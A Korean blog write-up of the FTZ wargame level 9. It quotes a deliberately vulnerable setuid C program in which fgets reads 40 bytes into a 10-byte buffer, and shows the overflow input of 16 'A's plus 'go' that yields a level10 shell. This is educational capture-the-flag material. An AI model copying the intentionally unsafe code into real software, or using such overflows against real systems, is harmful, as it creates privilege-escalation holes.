[FTZ] level9 ํ’€์ด

์ตœ๋Œ€ 1 ๋ถ„ ์†Œ์š”

๐Ÿ’ก FTZ level9 ํ’€์ด

๋ฌธ์ œ

๊ณ„์ • : level9/apple

hint

๋‹ค์Œ์€ /usr/bin/bof์˜ ์†Œ์Šค์ด๋‹ค.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(){

  char buf2[10];
  char buf[10];

  printf("It can be overflow : ");
  fgets(buf,40,stdin);

  if ( strncmp(buf2, "go", 2) == 0 )
   {
        printf("Good Skill!\n");
        setreuid( 3010, 3010 );
        system("/bin/bash");
   }

}

์ด๋ฅผ ์ด์šฉํ•˜์—ฌ level10์˜ ๊ถŒํ•œ์„ ์–ป์–ด๋ผ.

ํ’€์ด

bof๋ฅผ ์ด์šฉํ•ด์„œ buf2์— ๋ฐ์ดํ„ฐ๊ฐ€ buf๋ฐ์ดํ„ฐ๋ฅผ ๋ฎ์–ด์จ์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์šฐ์„  buf2์™€ buf ๊ฐ€ ๊ฐ๊ฐ ๋ช‡๋ฐ”์ดํŠธ ๋งŒํผ ํ• ๋‹น ๋ฐ›์•˜๋Š”์ง€ ํ™•์ธ ํ•ฉ๋‹ˆ๋‹ค.

gdb๋ฅผ ์‹คํ–‰ํ•˜๋ ค๊ณ  ํ•˜๋‹ˆ, permission denied๊ฐ€ ๋‚˜์˜ต๋‹ˆ๋‹ค.

๊ทธ๋ƒฅ ๋ช‡๊ฐœ ์•ˆ๋˜๋‹ˆ brute force๋ฅผ ํ•ด๋ด…๋‹ˆ๋‹ค.

๋ฐ์ดํ„ฐ์˜ ํ• ๋‹น์€ 4๋ฐ”์ดํŠธ ๋‹จ์œ„๋กœ ๋˜๊ธฐ ๋•Œ๋ฌธ์— 12, 16 , 20 .. ์ด๋ ‡๊ฒŒ ์ˆ˜ํ–‰์„ ํ•ฉ๋‹ˆ๋‹ค.

๋‹ค์Œ๊ณผ ๊ฐ™์ด 16๊ฐœ์˜ A๋กœ ๋ฎ์–ด์“ด ๋’ค์— ์‰˜์„ ํš๋“ํ•  ์ˆ˜ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค.

[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAgo
[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAAAAAgo
Good Skill!
[level10@ftz level9]$ id
uid=3010(level10) gid=3009(level9) groups=3009(level9)

image

ํƒœ๊ทธ:

์นดํ…Œ๊ณ ๋ฆฌ:

์—…๋ฐ์ดํŠธ:

๋Œ“๊ธ€๋‚จ๊ธฐ๊ธฐ